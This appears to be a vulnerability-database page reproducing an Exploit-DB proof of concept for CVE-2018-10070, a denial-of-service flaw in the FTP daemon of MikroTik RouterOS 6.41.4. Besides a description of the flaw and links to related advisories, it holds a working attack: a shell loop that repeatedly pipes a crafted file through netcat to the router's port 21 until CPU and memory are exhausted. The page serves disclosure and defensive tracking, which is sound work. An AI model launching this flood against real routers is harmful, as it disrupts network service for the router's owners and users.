Lucene search
K

MikroTik 6.41.4 - FTP daemon Denial of Service (PoC)

🗓️ 13 Apr 2018 00:00:00Reported by FarazPajohanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 62 Views

MikroTik 6.41.4 FTP daemon DoS vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today
MikroTik 6.41.4 - FTP daemon Denial of Service PoC
13 Apr 201800:00
zdt
CNVD
MikroTik FTP Daemon Denial of Service Vulnerability
18 Apr 201800:00
cnvd
CVE
CVE-2018-10070
16 Apr 201821:00
cve
Cvelist
CVE-2018-10070
16 Apr 201821:00
cvelist
exploitpack
MikroTik 6.41.4 - FTP daemon Denial of Service PoC
13 Apr 201800:00
exploitpack
NVD
CVE-2018-10070
16 Apr 201821:29
nvd
OpenVAS
MikroTik RouterOS 6.41.4 DoS Vulnerability
19 Apr 201800:00
openvas
Packet Storm
MikroTik 6.41.4 Denial Of Service
13 Apr 201800:00
packetstorm
Prion
Design/Logic Flaw
16 Apr 201821:29
prion
################
#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
#CVE: CVE-2018-10070
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : 6.41.4 (Released 2018-Apr-05) | All Version
#Date: 13-05-2018
#Category: Network Appliance
#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
#POC: https://vimeo.com/264461602
################

for i in `seq 1 100`

do
  cat craft |  nc -nv <MikroTik IP> 21 &
  sleep 2
done

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation